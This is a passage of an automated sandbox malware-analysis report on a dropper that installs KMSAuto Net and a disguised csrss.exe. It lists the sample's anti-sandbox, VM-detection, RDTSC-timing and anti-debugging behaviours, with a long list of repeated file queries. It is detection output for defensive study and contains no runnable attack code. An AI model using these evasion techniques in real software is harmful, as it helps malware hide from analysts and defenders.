              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: csrss.exe, 00000001.00000002.285935539.000000000041E000.00000020.00000001.01000000.00000004.sdmpBinary or memory string: SBIEDLL.DLL
              Tries to evade analysis by execution special instruction (VM detection)
              Source: C:\Users\user\AppData\Roaming\csrss.exeSpecial instruction interceptor: First address: 00000000007C5B12 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
              Source: C:\Users\user\AppData\Roaming\csrss.exeSpecial instruction interceptor: First address: 00000000007D1A75 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\AppData\Roaming\csrss.exeRDTSC instruction interceptor: First address: 00000000008DB6C4 second address: 00000000008DB6CB instructions: 0x00000000 rdtsc 0x00000002 inc ebp 0x00000003 mov bh, dl 0x00000005 cwde 0x00000006 pop ebp 0x00000007 rdtsc
              Source: C:\Users\user\AppData\Roaming\csrss.exeRDTSC instruction interceptor: First address: 00000000007DAB78 second address: 00000000007D1A75 instructions: 0x00000000 rdtsc 0x00000002 pop eax 0x00000003 jmp 00007F07147B6D5Dh 0x00000008 pop ebx 0x00000009 mov dx, sp 0x0000000c cmovle edx, esi 0x0000000f pop edx 0x00000010 jmp 00007F0714726433h 0x00000015 ret 0x00000016 popfd 0x00000017 rdtsc
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\csrss.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\csrss.exeSystem information queried: ModuleInformationJump to behavior
              Source: Amcache.hve.4.drBinary or memory string: VMware
              Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
              Source: Amcache.hve.4.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
              Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.4.drBinary or memory string: VMware7,1
              Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.me
              Source: Amcache.hve.4.drBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
              Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
              Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\AppData\Roaming\csrss.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\AppData\Roaming\csrss.exeSystem information queried: KernelDebuggerInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\csrss.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\csrss.exeProcess queried: DebugObjectHandleJump to behavior
              Source: C:\Users\user\AppData\Roaming\csrss.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeProcess created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe" /nc /sJump to behavior
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeProcess created: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe "C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe" /ncJump to behavior
              Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.drBinary or memory string: m/r /f /t 0ababccdabcdefgePathfgFlag Library not initialisedShell_TrayWndBelizeSoftwareProtectionPlatform\tokens.datBasqueNorwegianNot joined to any domain or group
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
